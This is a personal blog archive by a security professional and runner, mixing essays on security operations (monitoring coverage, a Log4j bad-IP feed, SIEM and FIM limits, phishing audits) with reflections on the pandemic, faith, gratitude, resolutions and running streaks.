I don't think that i am saying anything new when i say that good technical administration practices go a long ways towards good security -- i have said so for decades, so it can't be a new thought. This is why we hire professionals rather than saying "hey Bob, in addition to managing payroll, since you're a whiz with spreadsheets, can you take over running the mail and file-share servers?"

This is on my mind because i've been thinking about security program coverage, particularly in light of detecting exploitation in the great Log4j storm of 2021. To detect things, one must have logging and tool coverage -- current inventory to know risk, monitoring to see attacks, monitoring for unusual out-bound traffic, monitoring for weird processes being spawned by long-running services, etc. The bigger the environment, the less likely 100% coverage is; it might even be practically impossible at some scale, even given Chef and containers.

Here's the rub: if 1 host out of 100 isn't sending logs or isn't taking up things like AV definitions, that's really a lapse in administration -- Bob has missed a host. The catch is that hosts that are missed for monitoring are also more likely to be missed for patching, and, generally, more likely to be compromised than the hosts that aren't missed. So we have a double whammy: the hosts most at risk are also the hosts most poorly watched.

I don't have an answer for this; our compliance frameworks all give guidance, but that falls short in the Real World (tm). As far as i can think about it, the problem seems intractable.

This probably explains part of my insomnia.

Announcing the latest threat intelligence feed from your friends at The Dancing Frogs:

CVE-2021-44228, the great log4j RCE of 2021! https://www.thedancingfrogs.com/log4j_bad_ips.csv for all your "who is trying to exploit log4j in the backwaters of the Internet" needs!

This list looks back 30 days for attempts to exploit CVE-2021-44228. If they are trying us, they are trying you!

This log4j feed compliments our longstanding Bad SSH IPs feed of CIDR blocks that have tried SSH brute-force password guessing.

Disclaimer: all The Dancing Frogs threat intelligence feeds are curated in the laziest way possible. They are provided with no warranty. Use in perimeter firewalls may result in a lose of service (expect ISPs, VPN services, and similar mass on-ramps to occur.) Best used with apathy or a token from .

It has been a hot minute or two since i've pulled up the keyboard for some ranting. Clearly, i did not manage to keep the Rave component of my Resolutions for 2020.

Good news: i fixed the CSS that made archived postings unreadably black on silver. Or bad news, if you were content saying "whew, i don't have to read this madness."

On the topic of resolutions... i did not fall on the trails while running last year, so check that one. The pandemic did a number on my mental health resolutions, as it did for many people, i imagine. I did not make 2021 resolutions, because that's some energy i didn't really have. I'm not sad about it.

So i was reading through my Twitter feed, and i came upon this statement from some guy of whom i'd never heard. I'd normally just not care, but the phrase "Cowering inside for another 18 months..." just rubbed me wrong.

"Cowering."

It aggravates me, i suppose, because it is classic Real Man Tough Guy talk. The writer implies that he is too brave and bold to heed the advice of experts, and that his freedom is being impinged when the government keeps him from striding confidently out his door.

One does not have the freedom to spray bullets in the air, regardless of whether one is willing to "accept the consequences" of one's choices. One has never had the freedom to shout "fire" in a crowded theater, and one will not have that freedom once the pandemic is over. One does not have the freedom to walk into another person's home and talk all their good stuff. The list of "freedoms" one does not have can long be enumerated.

Mr. Personal Choice does not have the freedom to accept the risk of illness and death for the rest of society. That's the funny thing about living in a society that, apparently, Mr. Tough Guy Personal Choice forgets: society is about the greater good, the general Welfare. Sometimes, in order to establish justice, insure domestic Tranquility, and promote the general Welfare, individuals have to put the good of their fellows over their own personal desires to get a haircut, or whatever the fsck he thinks is so urgent that he has to "brave" the outside world.

Look, i'd love for the weight of responsibility for the lives of my fellows to be lifted. I'd love for racing season to open, i'd love to be able to go see the Mustangs play, i'd love to go to the bookstore, and, yes, i need a haircut so badly i'm looking like Bozo the Clown. You know what i i'd also love? Making it through this without the 3700 deaths Montana's 2.6% mortality rate predicts for a best-case herd immunity threshold; a healthcare system that is robust enough to handle a herd immunity curve; ....

Lent started this year with a sermon on the temptations of Christ, as it often does. I am currently struck by the relevance of the second temptation: Jesus was invited to jump from the pinnacle of the temple, and he rebuffed the tempter with "do not put the Lord your God to the test."

It is April 2020, and we are entrenched in a pandemic. Right now, we are being asked to sacrifice by keeping distant from other people (to varying degrees in this country). Yet, we have churches defying that, with, i'm certain, the best of intentions.

When i read of this, i cannot help but think that they trust the Spirit to keep the virus from infecting their flock. I commend that faith. Then i think to those words spoken against the tempter, "do not put the Lord your God to the test," and i wonder to whose voice those shepherds are listening.

Allow me to re-cast Matthew 4:5-6:

Then the devil took him to the pandemic and said "If you are the Son of God, gather the flock. For it is written 'He will command his angels for you, and they will lift you up in their hands, so that you will not have a single cough.'"

"Do not put the Lord your God to the test."

For the gentle reader for whom 2020 is but a legend, we are in a time of pandemic; you should ask whatever search engine remains for more details, because i'm sure that the writing until The Collapse read like Camus and Ellison.

The Collapse is still a time distant for me, and, let me be honest, i hope that we avoid it (perhaps another time, i'll sketch out a solution to the problem, just for future researchers.) At this time, my locale has asked us to practice "social distancing" and, because the species has devolved, shut down bars and gathering spots when people didn't behave. I'm blessed with having been raised -- and having returned to live -- in a rural state, and i've never been terribly fond of crowds... or people in general, which, really, means that i was born to this "social distancing" practice.

It is Sunday the 22nd. The last contact i had with anyone who doesn't live in this house was 10 days ago, at tango class (which i should have skipped, but, i have a history of a strong immune system, and i [still] have no reason to believe that i had been exposed). I'm not predicting that i will escape unscathed, because pandemic, and i'm not a hermit -- the virus could come in via my wife, it could come via the mail, it could drift over the fence.

(continued...)

Weeks have now passed. It is the 5th of April, and Spring is starting to rise. We've mostly seemed to adapt to this self-isolation: we've settling into a "work from home" routine, church is holding its service via streaming, our Palm Sunday parade was virtual. The self-isolation order is scheduled to expire here on Friday, but our curve hasn't peaked yet, so i expect an extension.

I very much hope that historians look back and say that the world over-reacted, but i strongly suspect that they will more likely discuss the blunders and senseless loss.

Some representatives from JW.com knocked on my door to ask if i feel optimistic, which i thought was a pretty nice thing to do. They shared an uplifting Psalm.

Of course i am optimistic; just maybe not in the way they asked. I have long been an adherent of

vanitas vanitatum omnia vanitas
quid habet amplius homo de universo labore suo quod laborat sub sole

The sun rises, set, and rises again. That is the source of optimism: the great clock of the universe ticks on, and will tick on long after i am gone. I may not be optimistic about the state of my nation or humanity, but that's all outside of my control. I can only hope that the scales fall from the eyes of those who perpetuate evil and hatred, and that they find courage rather than the fear that so terribly grips them.

Said JW representatives also spoke about wanting peace. Peace is funny: "strongmen" want Pax Romana, with themselves in the role of peace-bringers -- this i certainly do not want, for they do not know wisdom; other want an end to war -- i can get behind this end, but war ends when there is death or enslavement, too. Inner-peace, harmony, etc....

Each Sunday, we walk around the church and wish each other "the peace of God" -- "peace be with you" "... and also with you." It is touching, but the words of William Alexander Percy echo in my head with each benediction:

...

Contented, peaceful fishermen,
Before they ever knew
The peace of God that filled their hearts
Brimful and broke them too.

...

The peace of God, it is no peace,
But strife sowed in the sod.
Yet let us pray for just one thing
The marvelous peace of God.

So, you are a company and you make tool that does one thing really well. You test it, work out the bugs, and wrap it in a pretty case so it will stand out in the datacenter. It does performs the one job really well in the smaller companies that pick your product over the 500 pound gorilla that's already lodged itself in the giganto corp. Since it is marketed small, you just leave authentication local, because there will only be a handful of people who ever log in.

Time passes, you release new versions with a few more bells, and start winning bigger deals. And, look!, the thing still does what you designed it to do, like a champ. But, bigger deals mean bigger departments using the product, and, eventually, someone observes that it is a huge headache to locally manage accounts--not to mention the difficulty once regulatory guidance comes in and proscribes (now, thankfully, discredited draconian credential requirements.)

So, you bolt a few network authN/Z protocols on the side of the product. It defeats the point of networked authN to let local credentials also work (unless you want to spend a lot of time trying to integrate your Web auth with PAM, and add that complexity), so you just decree that one may either use local or one may use the network. Your smaller customers stick with local, and all of your internal labs stick with local, but the bigger customers have staff dedicated to making network AAA work, so they spend the time with the hammer to beat out a solution. Everyone's happy.

Then your customers start realizing that using the tool to monitor its own distributed components is the sort of trick that leads to lost limbs, and they start to request some sort of external monitoring capabilities. You're selling something that is a lot more networky than systemy, and your big customers all note that they have an established group that monitors device health with SNMP, so you bolt that on the side.

All this time, even though you've bolted on centrally managed tools, you are still doing all of your own development and training on small systems, with local authN; you have some people around to help out when someone wants to set up the central tools, but it is mostly "admin magic" that really rarely gets used.

Then, maybe, a someone who uses central authN wants to set up SNMP monitoring using v.3. V.3 has not-as-stupid as "public:public" authN for its pollers, and, through a quirk with your design, it is set up to use whatever "user name" is logged into the device doing the configuration. In testing, that was easy, because the POC just used the same default administrative user that does everything else. Your customers, of course, are going to say that's stupid, if only because they will have auditors who say that's stupid. You tell them "no problem: just make a generic user for SNMP monitoring and log in as that to do the configuration." That works slick as snot.

... until you get the customer who uses a two-factor authN. That generic user can't use two factor, and, even though SNMP v.3 uses its own auth, someone still has to log in to do the configuration.

So, you think about it, and decide to recommend turning off the networked authN long enough to log in as the generic user to configure SNMP v.3. Once the configuration is finished, you'll just turn on networked authN again. It works every time, in your lab. It turns out, though, that you made your product too well, and your customers expect it to work 24/7. That means that turning off networked authN is difficult to schedule.

Our problem here is that the points of contention are not related to your core competencies. AuthN on a large scale, SNMP v.3... these are not the product's focus, and this is such an edge case that you'd really be foolish to staff for it.

---

Sorry to just drift off here. I have comments on solutions, but i haven't tested them, and, it is possible, i suppose, that i'm wrong and there really is a confluence of factors that makes this "impossible." Maybe i'll come back after testing and finish up.

Part of this frustration is appropriated from a friend and coworker; however, phishing is about the dancing frogs, and everyone wants to see the dancing frogs, so it seems on-topic.

My employer faces audits by a company that insists on launching a phishing campaign against "key systems, network, and security personnel." Their approach is standard (possibly taken from and run by MetaSploit, actually): they set up a bogus site that looks like it could be one of our login pages, then they send mail from a bogus sender with a link to said page. You know, like "Annerican Express" sends you every week. Each link is personalized, and the auditing firm counts a hit on the link as a finding. Seems legit.

... except, of course, that they target security personnel. We are probably physically incapable of not investigating a suspected phishing attempt -- especially a spear-phishing attempt. Manual investigation will include things like tracing Received, reading DKIM-Signature, checking the corporate director for the validity of the sender, and, of course, fetching and unpacking the suspicious link. Maybe we send it to the vendor X provided sandbox (maybe automatically, based on a set of Procmail recipes), maybe we fire up a VM for testing, maybe we curl(1) into /tmp/fuckuclown and read it.

Uh oh! We've just created a finding! Best case: we have to retake phishing-awareness 101; worst case: the company gets a POAM and loses that revenue. And this is all because the auditing firm neither honors scope nor visualizes risk. They are concerned that "clicking the link will introduce malware into the 'system,'" but they do not define "the system;" they do not account for technical controls, except perhaps to have them intentionally disabled to allow for the test

(say, for example, that the MTA will not allow external MTAs to send messages claiming to come from internal senders... the testers have to explicitly have that control disabled. Perhaps the company has purchased a border anti-phishing product or service, which automatically tests the validity of any in-bound URL; disabled for the purpose of the test.)

They do not account for in-browser defenses. Since they don't actually ship an evil payload, they do not account for end-point defenses.

And, again, they have targeted people who are chartered to investigate potential threats. In our case, they want to have things both ways: they want to test devices that are specifically out-of-scope (IT workstations) and they product staff to leave any investigation to the IT side of the house; either the risk is for IT, and out of scope, or the risk is production, and is investigated accordingly.

I don't really have solutions to this to offer, though. I mean, it wouldn't take much convincing for me to visit the offices of any company that sent malicious zero-days as part of a phishing-awareness test with a Clue Club and bail money (no, kids, violence is not the answer!). I don't really want an audit firm to actually gather legitimate credentials from a test, because, well, that's a bunch of PII that is now stored with an untrusted third party.

I think the only real answer i can offer is "don't test administrative controls with technical solutions." Or, at least, don't do it casually. If you want your Red Team to offer $25k bribes to system administrators for root passwords, have at... just don't be surprised when your test costs an extra $250k and you have to recruit 10 new sysadmins and change the super-user credentials on a couple thousand production servers. After all, your favorite search engine can pretty quickly provide case studies around candy bar for password exchanges.

Well, my posting on my thoughts on the virgin birth went into the ether, thanks to browser's certificate checking. You'll just have to trust that it was profound and would both challenge and solidify your own faith. Or maybe it wouldn't have; writing it out still helped me.

I expect to see other Advent seasons, so i will probably revisit the topic.

So, i ended 2019 with more mileage than i believe i've ever had. I extended my 200 km/month streak to 13 months. To meet those two arbitrary goals i had to do a couple of >10% increase weeks, because the start of the month had a calf-strain; i feel a little dirty about it, because neither accomplishment is a big thing, even to me. It really felt like doing something to do something.

Doing something to do something is a seasonal disorder. The end of one Gregorian year comes around, and we rush to meet some nearly forgotten goal we set at the start of the year; the start of the year comes, and we are all eager to uphold our resolutions to be more productive, or go to the gym more, or stop consuming caffeine my dark goddess. So we have 2-4 weeks of furious activity, most of which matters only to ourselves, and at least some of which may actually be harmful to other parts of our lives, or to the people around us.

One question that seems to get posed to a lot of professional female runners is "how do you justify so much 'me time' for your training?" (I'm not a big name runner, but i don't recall reading that question in interviews with any male runners.) That question can really be posed to all of us in DStDS season; i worked about 11 hours for one job today, i'm sitting in front of another computer writing this, and i'll probably work another job before the day is over... that's basically a full day of neglecting friends, family, and dogs. If i'd foiled a plot to overthrow the U. S. Government like Jack Bauer, i might be able to justify it; i did not. I didn't even get a lot of pleasure from re-arranging 1s and 0s or solving interesting problems.

Not to mention the fact that i only got 5 km of running with the dogs, so i'm already falling behind on a completely arbitrary and meaningless mileage goal for 2020. It was snowing sideways, though, and any run with sideways snow is a good run.

MMXIX is over, for good or ill. I'll sum that up sometime, or i won't; right now, i want to make my resolutions.

Big

Chemical balance

I resolve to use alcohol and caffeine to balance my chemicals less frequently. That doesn't mean that i will consume less of either, only that i will not do it to relieve anxiety or otherwise battle my demons.

Goose

I resolve to accept fewer lectures on how i can (bluntly) change myself to better suit you. If you are not my psychologist, life-coach, personal trainer, choir director, or some other professional i have actively sought-out for self-improvement advice, you can keep your fscking opinion to yourself. Frankly, i spend enough time trapped in my own head trying to keep my sense of self-worth afloat; i don't need you adding to that. If i am not bringing joy to your life, you should fscking cut me out of it and find someone who does. I am, when not weighted down by my own self-loathing, as decent of a human being as the next person, and you can fscking treat me like it.

Seriously, i've seen a revolution or two of this planet around the sun, and i've pretty much accepted that i "yam what i yam, and that's all what i yam;" if you can't accept me as is, now is the time to cut and run. No hard feelings.

Mental health

I resolve to remember more often that i am a decent human being, and to strive to continue to be such.

Gander

I resolve to give fewer lectures on how others can change themselves to better suit me. Unless y'all ask me for self-improvement guidance, i'm going to do my level best to avoid volunteering opinions or "looks." (Yes, even the looks of distain or exasperation will have to go.) Y'all are decent human beings, even when i think you've been rude or dense or selfish, and i can either be more empathetic and treat you like it, or we can part ways. 'taint no point in staying in harmful relationships.

Lesser

Rave

I resolve to scribble down some thoughts each Wednesday, so as to give myself regular self-examination.

Flex

I resolve to engage in at least 20 minutes of yoga or other flexibility practice no less than 3 days per week. I've had about enough of being the Tin Man in the rain.

Fall

I resolve to not fall while running this year. Because, ouch.

Look, folks, i'm not looking for "happiness." I'm just looking to not be miserable and angry. I'm looking to not constantly ask myself what the fscking i'm doing here. I'm just looking to keep my mental illness(es) in check, and to let you keep your mental illness(es) in check.

The kingdom of heaven is found when one stops living lies and lives as one's true self.

(Perhaps. The secrets of the kingdom of heaven were not given to me, so i have to puzzle parables, like everyone else.)

Children and animals live mostly without guile. They have not learned to hide themselves from shame, or the fear of shame. They live their lives without those lies we present because "what will people think?" The live without the masks.

Theirs is the kingdom. And, truthfully, the kingdom is already here for them. Then we teach them to cower, to fight, to value things, to give a rat's ass what other people think. Then they lose the kingdom and become exiles like the rest of us.

(To be continued....)

III.

The SIEM is probably not the right tool for forensics.

I had a dream, once, of using the SIEM for all alarms, correlating events, seeing security concerns in near real time, having all the logs at my fingertips, using the power of the SIEM to find new trends and threats like the protagonist in a Ron Howard movie. Oh, and letting ops use it to manage all their non-security logs. And storing all logs for HIPAA-long, even if they were debug messages. I tell ya, it was better than dancing sugar plums.

Then reality set in. More to the point, log fatigue hit. And budget, but mostly log fatigue. The haystack was just too big, and the SIEM started to fall down on its primary function: alerting, correlating, and reporting.

That's what you really want your SIEM to do: correlate a probe against that Wordpress you are running with some DNS requests for evilhacker.example.com with a connection from your web server to your file server, with a klaxon sounding so someone can race and pull the plug before the big "encrypt all xlsx files" kicks off and you have to convert Christmas bonuses to bitcoin to bring your municipal services back online. You don't want it to thrash away on "mark" records or 60 days' worth of web access logs looking for a possible SQL timing attack sometime around last May.

You see, to perform in-depth forensics, you have to have all of the logs (and pcaps and memory dumps ad atop records and ....), not just those that are useful for correlation and alarming. That presents two problems:

1. SIEM resources for non-security logs, and
2. Fatigue and confusion for the front-line handlers.

The space and horse-power of the SIEM is a finite resource, and even when money is no object, money is an object for non-revenue generating endeavors.

I.

If your regularly scheduled network scan catches a service that an intruder has set running -- say something like a command-n-control center -- it was blind-ass-luck. Network scanning isn't intended to catch intruders, it is intended to give your system, network, and security folks an idea of their threat surface and potential/actual risks.

(That might not be as unpopular now as it once was, thanks to careful branding on the part of major market players.)

II.

Your file integrity checker -- Tripwire, Aide, BART, awk -F : '{foo = sprintf("sha256 -c %s %sn", $2, $1); if (system(foo) == 2) {print $1" has changed"}}' /etc/my_FIM_db, whatever -- is not in intrusion detection tool. Except, again, by blind-ass-luck. Yes, i have heard the pitch from the vendors, and yes, i know that AIDE stands for "Advanced Intrusion Detection Environment"; they are literally trying to sell you something. My Subaru says that it will go 140 MPH, and, who knows, it might; that's not its purpose, and it is really unlikely to do it well.

What's funny is that they don't have to say that their FIM product is a HIDS for it to be valuable. The actual purpose of the tool is a big deal, and stands on its own. FIM is important, it just is a different control than "intrusion." Use FIM tools to note when your system has changed outside of planned updates; update your FIM database after every planned system update; use your FIM tools to validate that updates were successful.

"But but but the trojans! Adding keys to root's authorized_keys! MALLLWAAAAAAREEEEE! How will we know? How will we know?" Look, it's like this: unless you are storing the DB non-locally or on some sort of immutable read-only media, and you are running your FIM real-time (maybe as an agent tied to auditd), whatever your scan window is is more than long enough for Malcolm to update the database with values that suit him. Seriously: the first recommendation a popular (and privacy-friendly) search engine returns says to run weekly; more, it says to never run more frequently than daily. Do you really think Malory won't be able to re-arrange the paintings and get a key made for the backdoor in a day?

For years now, there has been mindless blathering about "the war on Christmas." The story always goes something like this: "the [other -- probably a derogatory term] are trying to make it illegal to say 'Merry Christmas.'" It is utter hogwash. Ask me how i really feel.

That's not today's topic, directly.

Halliburton told 800 people today that they no longer had jobs. Halliburton -- the company that was fed barrels of cash by V. P. Cheney, the company given no-bid contracts for at least two wars... these folks couldn't even wait until after the Holidays. Merry fscking Christmas.

That, gentle reader, is the war on Christmas, the war on the spirit of generosity, caring, love by the forces of avarice, of the almighty .05% uptick in stock price. This is the season when we watch _A Miracle on 34th Street_, _A Christmas Carol_, and _It's a Wonderful Life_ -- heck, even National Lampoon rages against the profit-over-people mindset that our captains of industry carry.

There is a war on Christmas happening, but it is not being waged by your friend who wishes you "happy holidays;" it is being waged by the heirs of Scrooge and Mr. Potter. It is being waged by people who have insulated themselves from "workers" so they can seriously contemplate a jam of the month club rather than giving a paycheck.

It is the season to contemplate gratitude, and i am nothing if not a follower of trends.

It seems to me that walking the path of life with "I deserve" on one's lips is inviting bandits to steal one's contentment. If i choose to believe that the wages of sin is Hell, then, ultimately, the only thing i deserve is death and eternal suffering. Holding that, then, all else is a gift -- undeserved.

If, then, all of life is a gift, then gratitude is probably the appropriate attitude to carry (Jubal Harshaw's position on gratitude notwithstanding... hmm, that position may very well be the root of the resentment that leads to "I deserve..."; further contemplation may be required). We are given countless blessings, i hold, and we should be grateful for them all. We should be grateful even when, like the Rubik's Revenge i received one Christmas, we can't understand the gift; trials can be like that.

No one i know would ever accuse me of being overly cheery happy, and i should probably be a little sad about that, being a "the kingdom of Heaven is here, now!" adherent. I'm not sad about that, though, because i have eyes, and i see the ugly and horrible in the here-and-now as well as the beauty and wonderful. I am grateful that i can see both; i am grateful that the ugly and the horrible pains me each day, because it means i still have empathy and a sense of justice; i am grateful for the beauty and wonder because it is beautiful and wonderful, but also because it is a balm for the pains, and fends off despair.

I am grateful for mercy, because i require a lot of it, especially when i realize that i have not shown enough of it.

I am grateful for love, for the people who have shown me both how to give and how to accept it. I can't imagine that i am easy to love, and thus am ever challenged accepting that gift from others; the examples of gracious acceptance are fine gifts indeed.

I am grateful each day to have survived the day, physically, emotionally, and spiritually. At the close of the day, i may have victories, i may have defeats, i may beam with contentment or i may burn the paint from the walls with my self-loathing; in all cases, i know that i have been blessed to have another day.

I am most grateful for grace, because grace is the source of the many gifts i have received. By grace alone have i not received the wages i deserve, and do i believe that i will never get what i deserve.

The Dead Runners' Society used to have an annual 100 day challenge, in which participating members would run, walk, or otherwise exercise every day for the first 100 days of the year. I was never willing to participate, because i've historically been more motivated by rebelling against expectations than i have been by winning. I always followed it, though, because watching people face their challenges is always up-lifting.

For 2014, i decided to "shadow" the challenge. I hadn't run a single day in December of 2013, and i've defined myself by running since i was 13, so i wanted something to get me going. I set a personal standard of 3.2 km a day, which i called "2 miles," and on 1 January, i logged the first day.

It was hard. Forming a new habit is hard, carving out time to run each day was hard, doing that in the middle of a Montana winter was hard. It was not monumentally hard. It just meant putting on shoes and doing it.

One hundred days puts things around 10 April, depending upon the year. I remember looking forward to the end through much of March, because it was time i could spend doing something else, and, ultimately, it was a silly quest. But, April 11th dawned, and i said "well, you might as well do another day." Plus, i'd signed up to do the duathlon in the Peaks to Prairie, so i "needed" the runs. So i kept at it. And it was easier through the summer, because there was always another target race, and getting mileage is easier when running every day. And, since i was running regularly, i started setting old-guy PRs.

That fall, i completed two marathons, 28 days apart. My streak remained intact, with painful recovery runs the days after each marathon. By that time, i'd settled on keeping the streak for a year. Then 1 January rolled around, and i already had the habit; i went for a run.

Blah. blah, blah... 2019 is coming to a close, and i've only added streaks: I started logging at least 20 miles each week in September of 2015 (the week i had the flu in 2017 was... rough); i have 12 straight months with at least 200 km. It's all just arbitrary numbers, but it becomes habit.

This is a throw-away, because i want to write at least once a day in December until Christmas, and the 1st is almost over.

Skipping the preamble...

Computer stuff is all just 1's and 0's, so the answer to any "can we do X" question that is software related will always be "yes." Giving that response without factoring in values -- asking yourself whether it is something that one should do -- is self-delusion at best and, more likely, malfeasance.

Seriously. Don't be that asshole who prioritizes movement and/or helpfulness over guidance and diligence. You may think you're being all DevOps-ey, but all you are really doing is scheduling an appearance before some Congressional subcommittee for some hapless executive who was fscking relying on your expertise to inform the decision. History is riddle with tales of evil that came from not applying values to these types of decisions. ("Hey, is it possible to give Cambridge Analytics access to all of the data we tell our users is private? They'll pay." "Sure is, boss. Maybe 15 minutes to arrange." "Excellent! I get another Ferrari!" Fscking selling out humanity for a p**** substitute. Ask me how i really feel.) Ask Volkswagen how happy they were about "helpful."

Not every request is a Project Dragonfly, of course; most "can we do X" questions are not going to be seeking to enable human rights violations. Most questions are still going to be posed by non-experts, however.

Ask not whether something is possible; rather, ask if it is correct. If you are only giving movement and trying to be helpful, you aren't giving any value-add over machine learning.

The controls one puts into effect and the way one focusses one's energies must be driven by the environment one defends, if one has any hope of success.

That's pretty wordy, as is my wont. Essentially, it doesn't matter what the speaker at NDSS says*, you have to prioritize and design for what you have. It doesn't make much sense to hire armed security if everyone works remotely; it doesn't make sense to focus on Windows logs when you have 100k Linux hosts hanging on the 'Net and 4 Windows hosts running your surveillance cameras; it doesn't make much sense to worry about geo locations if you can't restrict by them.

This stuff isn't one-size-fits-all. Department of Energy research locations have different threat models than HS for major retailers than Cyber Monday shops than POS devices than ISPs than video streamers, and anyone who tells you that you need a DLP/Sandbox/Reputation service because that's what S-Mart installed after the Deadites rolled in should be quickly shown the door -- unless S-Mart and Deadites are your threat model, in which case you might give the recommendation some thought.

It's risky when "outsiders" come in, because we are all zealots for some sort of technology (Chuck rulzers!), and we carry that with us even when we try not to. And, let's face it, when you recruit someone who might be offering recommendations on how to secure your stuff, you are counting on hir to be able to bring past experience and expertise.

You just have to remember that you don't actually need a detector for optical vampire tapping on an all-copper network.

* s/NDSS/Black Hat/g changes nothing but the venue.

"Everyone wants to see the dancing frogs."

It is something i've said from very early in my career in information security. Not from the start; at the start, i thought what all new practitioners think: if i configure the firewall and the hosts right, i'll succeed in keeping things safe. Eventually, we all learn differently.

The dancing frogs are almost never going to be hastily and poorly drawn ballroom dancers, waltzing off the edge of a piece of scrap paper. The dancing frogs used to be a cool game on a floppy that would install Michelangelo, or an "Important Message From (your colleague who already saw the dancing frogs)," or that cool new website off on the side streets of the 'Net. Now, the dancing frogs can be that USB drive you found in the parking lot, or mail from "your bank" about a disputed charge, or a "security alert" from "Google" sent to a gaggle of high-value targets.

People always want to click to see the dancing frogs. They'll do it the day after they take their corporate security awareness training. They'll do it from high security locations. They'll do it because Mallory can find a bait with the right right degree of insignificance or urgency to hook a target, and it's hard to break free of the line once that happens.

I live where winter temperatures drop to -33 C a few times every year. When i run on those days, i have to set my route to avoid crossing any streets at a traffic light, because "beg buttons" can mean standing around for 3-5 minutes waiting for the blessing of the walker icon. That's 3-5 minutes in probably sweet-soaked clothing (because i'm certain to start with extra clothing, just in case something bad happens and i have to walk), at a temperature that is life-threatening.

While i am standing around, gambling that neither hypothermia nor frostbite will kick in, the people who matter to DOT are zooming by in heated comfort. Often, while i am trying to decide if i am suffering from delusions as my brain shuts down from the cold, i pine for the "beg buttons" that prioritize the pedestrian -- those sweet sweet devices that immediately set a flurry of flashing lights to tell the drivers to stop for the meat-sack that is at the cross-walk.